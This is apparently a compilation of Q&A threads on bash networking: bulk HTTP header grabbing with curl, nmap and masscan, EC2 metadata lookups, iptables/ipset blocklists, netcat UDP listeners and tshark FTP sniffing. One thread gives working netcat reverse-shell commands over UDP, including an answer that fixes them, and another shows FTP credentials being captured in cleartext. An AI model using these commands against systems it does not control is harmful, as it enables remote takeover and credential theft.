Script that will print HTTP headers for multiple servers - bash

I've created the following bash script:
#!/bin/bash
for ip in $(cat targets.txt); do
"curl -I -k https://"${ip};
"curl -I http://"${ip}
done
However I am not receiving the expected output, which is the HTTP header responses from IP addresses listed in targets.txt
I'm not sure how curl can attempt both HTTP and HTTPS (80/443) within one command, so I've set two seperate curl commands.

nmap might be more appropriate for the task: nmap -iL targets.txt -p T:80,443 -sV --script=banner --open
Perform a network map (nmap) of hosts from the input list (-iL targets.txt) on TCP ports 80 and 443 (-p T:80,443) with service/version detection (-sV) and use the banner grabber script (--script=banner, ref. https://nmap.org/nsedoc/scripts/banner.html). Return results for open ports (--open).
... or masscan (ref. https://github.com/robertdavidgraham/masscan): masscan $(cat targets.txt) -p 80,443 --banners
Mass scan (masscan) all targets on ports 80 and 443 (-p 80,443) and grab banners (--banners).

Remove the quotes around your curl commands. You also don't need the ; after the first curl.
#!/bin/bash
for ip in $(cat targets.txt); do
curl -I -k https://${ip}
curl -I http://${ip}
done

I added some echo's to #John's answer to be able to have a better visibility of the results of the curl executions. Also added port 8080 in case of proxy.
#!/bin/bash
for ip in $(cat $1); do
echo "> Webserver Port Scan on IP ${ip}."
echo "Attempting IP ${ip} on port 443..."
curl -I -k https://${ip}
echo "Attempting IP ${ip} on port 80..."
curl -I http://${ip}
echo "Attempting IP ${ip} on port 8080..."
curl -I http://${ip}:8080
done

Related

How can I have my bach script pull in my EC2 instance IP address?

I'm trying to update my /etc/hosts file with my EC2 instance's Ip address, but I keep getting errors. Here's my portion of the bash script that is trying to accomplish this:
TOKEN=curl -s -X PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600"
INSTANCE_IP=wget --header="X-aws-ec2-metadata-token:$TOKEN" -qO- http://instance-data/latest/meta-data/local-ipv4
echo "$INSTANCE_IP whatever.hostname.com" | tee -a /etc/hosts
When running this, I got an error saying -s: command not found, so I removed that from the script and tried again and now I'm getting this error -X: command not found. How can I pull in the instance's ipv4 address vis SSM? I'm also using the Amazon Linux 2 AMI for my instances.
The syntax is off. Try it this way:
TOKEN=$(curl -s -X PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600")
INSTANCE_IP=$(wget --header="X-aws-ec2-metadata-token:$TOKEN" -qO- http://instance-data/latest/meta-data/local-ipv4)
echo "$INSTANCE_IP whatever.hostname.com" | tee -a /etc/hosts

Obtain reverse shell over UDP with netcat

I want to get a reverse shell over UDP using netcat. Netcat by default sends traffic over TCP, so in order to send it over UDP I run the -u option like this:
Host 1:
nc.traditional -l -p 4444 -v -u
Host 2:
nc.traditional localhost 4444 -e /bin/bash -u
But when I type a bash command I do not get the output. Why is that?
There are several problems with this:
You use localhost on Host 2. This is a special hostname that refers to the current host, not to Host 1.
UDP has no connections. Host 1 won't know where to send packets if it doesn't receive a message first.
bash reads input character by character, which doesn't work well with non-stream packet based data.
You can instead connect nc and bash with streams, and then send an immediate packet so that Host 1 will know where to send the commands you enter:
Host1:
nc.traditional -l -p 4444 -v -u
Host 2:
mkfifo fifo
nc.traditional -u host1 4444 < fifo |
{
echo "Hi"
bash
} > fifo

How to quickly add rules to iptables from blocklists?

I am using Ubuntu Server 14.04 32bit for the following.
I am trying to use blocklists to add regional blocks (China, Russia...) to my firewall rules and am struggling with the length it takes my script to complete and understanding why a different script fails to work.
I had originally used http://whatnotlinux.blogspot.com/2012/12/add-block-lists-to-iptables-from.html as an example and tidied up / changed parts of the script to pretty close to what's below:
#!/bin/bash
# Blacklist's names & URLs array
declare -A blacklists
blacklists[china]="http://www.example.com"
#blacklists[key]="url"
for key in ${!blacklists[#]}; do
#Download blacklist
wget --output-document=/tmp/blacklist_$key.gz -w 3 ${blacklists[$key]}
iptables -D INPUT -j $key #Delete current iptables chain link
iptables -F $key #Flush current iptables chain
iptables -X $key #Delete current iptables chain
iptables -N $key #Create current iptables chain
iptables -A INPUT -j $key #Link current iptables chain to INPUT chain
#Read blacklist
while read line; do
#Drop description, keep only IP range
ip_range=`echo -n $line | sed -e 's/.*:\(.*\)-\(.*\)/\1-\2/'`
#Test if it's an IP range
if [[ $ip_range =~ ^[0-9].*$ ]]; then
# Add to the blacklist
iptables -A $key -m iprange --src-range $ip_range -j LOGNDROP
fi
done < <(zcat /tmp/blacklist_$key.gz | iconv -f latin1 -t utf-8 - | dos2unix)
done
# Delete files
rm /tmp/blacklist*
exit 0
This appears to work fine for short test lists, but manually adding many (200,000+) entries to iptables takes an EXORBITANT amount of time and I'm not sure why? Depending on the list I have calculated this taking upwards of 10 hours to complete which just seems silly.
After viewing the format of the iptables-save output I created a new script that uses iptables-save to save working iptables rules and then appends the expected format for blocks to this file, such as: -A bogon -m iprange --src-range 0.0.0.1-0.255.255.255 -j LOGNDROP, and eventually uses iptables-restore to load the file as seen below:
#!/bin/bash
# Blacklist's names & URLs arrays
declare -A blacklists
blacklists[china]="http://www.example.com"
#blacklists[key]="url"
iptables -F # Flush iptables chains
iptables -X # Delete all user created chains
iptables -P FORWARD DROP # Drop all forwarded traffic
iptables -N LOGNDROP # Create LOGNDROP chain
iptables -A LOGNDROP -p tcp -m limit --limit 5/min -j LOG --log-prefix "Denied TCP: " --log-level 7
iptables -A LOGNDROP -p udp -m limit --limit 5/min -j LOG --log-prefix "Denied UDP: " --log-level 7
iptables -A LOGNDROP -p icmp -m limit --limit 5/min -j LOG --log-prefix "Denied ICMP: " --log-level 7
iptables -A LOGNDROP -j DROP # Drop after logging
# Build first part of iptables-rules
for key in ${!blacklists[#]}; do
iptables -N $key # Create chain for current list
iptables -A INPUT -j $key # Link input to current list chain
done
iptables-save | sed '$d' | sed '$d' > /tmp/iptables-rules.rules # Save WORKING iptables-rules and remove last 2 liens (COMMIT & comment)
for key in ${!blacklists[#]}; do
#Download blacklist
wget --output-document=/tmp/blacklist_$key.gz -w 3 ${blacklists[$key]}
zcat /tmp/blacklist_$key.gz | sed '1,2d' | sed s/.*:/-A\ $key\ -m\ iprange\ --src-range\ / | sed s/$/\ -j\ LOGNDROP/ >> iptables-rules.rules
done
echo 'COMMIT' >> /tmp/iptables-rules.rules
iptables-restore < /tmp/iptables-rules.rules
# Delete files
rm /tmp/blacklist*
rm /tmp/iptables-rules.rules
exit 0
This works great for most lists on the testbed however there are specific lists that if included will produce the iptables-restore: line 389971 failed error, which is always the last line (COMMIT). I've read that due to the way iptables works whenever there is an issue reloading rules the error will always say the last line failed.
The truly odd thing is that testing these same lists on Ubuntu Desktop 14.04 64bit the second script works just fine. I have tried running the script on the Desktop machine, then using iptables-save to save a "properly" formatted version of the ruleset, and then loading this file to iptables on the server using iptables-restore and still receive the error.
I am at a loss as to how to troubleshoot this, why the initial script takes so long to add rules to iptables, and what could potentially be causing problems with the lists in the second script.
If you need to block a multitude of IP Addresses, use ipset instead.
Step 1: Create the IPset:
# Hashsize of 1024 is usually enough. Higher numbers might speed up the search,
# but at the cost of higher memory usage.
ipset create BlockAddress hash:ip hashsize 1024
Step 2: Add the addresses to block into that IPset:
# Put this in a loop, the loop reading a file containing list of addresses to block
ipset add BlockAddress $IP_TO_BLOCK
Finally, replace all those lines to block with just one line in netfilter:
iptables -t raw -A PREROUTING -m set --match-set BlockAddress src -j DROP
Done. iptables-restore will be mucho fasta.
IMPORTANT NOTE: I strongly suggest NOT using a domain name to be added into netfilter; netfilter needs to first do a DNS Resolve, and if DNS is not properly configured and/or too slow, it will fail. Rather, do a pre-resolve (or periodic resolve) of domain names to block, and feed the found IP addresses to the "file containing list of addresses to block". It should be an easy script, invoked from crontab every 5 minutes or so.
EDIT 1:
This is an example of a cronjob I use to get facebook.com's address, invoked every 5 minutes:
#!/bin/bash
fbookfile=/etc/iptables.d/facebook.ip
for d in www.facebook.com m.facebook.com facebook.com; do
dig +short "$d" >> "$fbookfile"
done
sort -n -u "$fbookfile" -o "$fbookfile"
Every half hour, another cronjob feeds those addresses to ipset:
#!/bin/bash
ipset flush IP_Fbook
while read ip; do
ipset add IP_Fbook "$ip"
done < /etc/iptables.d/facebook.ip
Note: I have to do this because doing dig +short facebook.com, for instance, returns exactly ONE IP address. After some observation, the IP address returned changed every ~5 minutes. Since I'm too lazy occupied to make an optimized version, I took the easy way out and do a flush/rebuild only every 30 minutes to minimize CPU spikes.
The following is how I ended up solving this using ipsets as well.
#!/bin/bash
# Blacklist names & URLs array
declare -A blacklists
blacklists[China]="url"
# blacklists[key]="url"
# etc...
for key in ${!blacklists[#]}; do
# Download blacklist
wget --output-document=/tmp/blacklist_$key.gz -w 3 ${blacklists[$key]}
# Create ipset for current blacklist
ipset create $key hash:net maxelem 400000
# TODO method for determining appropriate maxelem
while read line; do
# Add addresses from list to ipset
ipset add $key $line -quiet
done < <(zcat /tmp/blacklist_$key.gz | sed '1,2d' | sed s/.*://)
# Add rules to iptables
iptables -D INPUT -m set --match-set $key src -j $key # Delete link to list chain from INPUT
iptables -F $key # Flush list chain if existed
iptables -X $key # Delete list chain if existed
iptables -N $key # Create list chain
iptables -A $key -p tcp -m limit --limit 5/min -j LOG --log-prefix "Denied $key TCP: " --log-level 7
iptables -A $key -p udp -m limit --limit 5/min -j LOG --log-prefix "Denied $key UDP: " --log-level 7
iptables -A $key -p icmp -m limit --limit 5/min -j LOG --log-prefix "Denied $key ICMP: " --log-level 7
iptables -A $key -j DROP # Drop after logging
iptables -A INPUT -m set --match-set $key src -j $key
done
I'm not wildly familiar with ipsets but this makes for a much faster method of downloading, parsing and adding blocks.
I've added individual chains for each list for more verbose logging that will log which blocklist the dropped ip is coming from should you have multiples. On my actual box I'm using around 10 lists and have added several hundred thousand addresses with no problem!
Donwload Zones
#!/bin/bash
# http://www.ipdeny.com/ipblocks/
zone=/path_to_folder/zones
if [ ! -d $zone ]; then mkdir -p $zone; fi
wget -c -N http://www.ipdeny.com/ipblocks/data/countries/all-zones.tar.gz
tar -C $zone -zxvf all-zones.tar.gz >/dev/null 2>&1
rm -f all-zones.tar.gz >/dev/null 2>&1
Edit your Iptables bash script and add the following lines:
#!/bin/bash
ipset=/sbin/ipset
iptables=/sbin/iptables
route=/path_to_blackip/
$ipset -F
$ipset -N -! blockzone hash:net maxelem 1000000
for ip in $(cat $zone/{cn,ru}.zone $route/blackip.txt); do
$ipset -A blockzone $ip
done
$iptables -t mangle -A PREROUTING -m set --match-set blockzone src -j DROP
$iptables -A FORWARD -m set --match-set blockzone dst -j DROP
example: where "blackip.txt" is your own ip blacklist and "cn,ru" china-russia"
Source: blackip

Bash script upd error

I execute my bash script PLCCheck as process
./PLCCheck &
PLCCheck
while read -r line
do
...
def_host=192.168.100.110
def_port=6002
HOST=${2:-$def_host}
PORT=${3:-$def_port}
echo -n "OKConnection" | netcat -u -c $HOST $PORT
done < <(netcat -u -l -p 6001)
It listens on UDP Port 6001.
When I want to execute my second bash script SQLCheck as process that listens on UDP Port 4001
./SQLCheck &
SQLCheck
while read -r line
do
...
def_host=192.168.100.110
def_port=6002
HOST=${2:-$def_host}
PORT=${3:-$def_port}
echo -n "OPENEF1" | netcat -u -c $HOST $PORT
done < <(nc -l -p 4001)
I got this error:
Error: Couldn't setup listening socket (err=-3)
Port 6001 and 4001 are open in the iptables and both scripts work as a single process. Why do I get this error?
I have checked the man page of nc. I think it is used on a wrong way:
-l Used to specify that nc should listen for an incoming connection rather
than initiate a connection to a remote host. It is an error to use this
option in conjunction with the -p, -s, or -z options. Additionally,
any timeouts specified with the -w option are ignored.
...
-p source_port
Specifies the source port nc should use, subject to privilege restrictions
and availability. It is an error to use this option in conjunction with the
-l option.
According to this one should not use -l option with -p option!
Try to use without -p, just nc -l 4001. Maybe this is the error...

Capture ftp hostname and uri using tshark (wireshark)

I want to watch the ftp traffic and find which ftp urls are being accessed with tshark. For http traffic I can use
tshark -i eth0 -f 'port 80' -l -t ad -n -R 'http.request' -T fields -e http.host -e http.request.uri
Wireshark's Display Filters contains the fields http.request.uri and http.host
See: http://www.wireshark.org/docs/dfref/h/http.html
But these options are not available for ftp traffic.
http://www.wireshark.org/docs/dfref/f/ftp.html
What can I do?
The problem is that FTP is not a stateless transactional protocol like HTTP - with HTTP the client does a single request which details all the parameters required to deliver the file, and the server responds with a single message that contains all the metadata and the file contents.
In comparison, FTP is a chat-style protocol: to get something done you open a connection to the server and starts chatting with the server - login, change to some directory, list files, get me this file, etc.
You can listen into this conversation using wireshark like this:
tshark -i lo -f 'port 21' -l -t ad -n -R ftp.request.command -T fields -e ftp.request.command -e ftp.request.arg
The output received when a user tries to retrieve a file from the FTP server (in this example using the client software curl) might look like this:
USER username
PASS password
PWD
CWD Documents
EPSV
TYPE I
SIZE somefile.ext
RETR somefile.ext
QUIT
A bit of processing over that might give you a URL like log of file retrievals. For example, I came up with this thing using perl:
tshark -i lo -f 'port 21' -l -t ad -n -R ftp.request.command \
-T fields -e ftp.request.command -e ftp.request.arg | \
perl -nle '
m|CWD\s*(\S+)| and do {
$dir=$1;
if ($dir =~ m,^/,) { $cwd=$dir } else { $cwd .= "/$dir"; }
};
m|RETR\s*(\S+)| and print "$cwd/$1";'
For the same FTP session above, this script will yield a single line of output:
/Documents/somefile.ext
I hope that helps.

Resources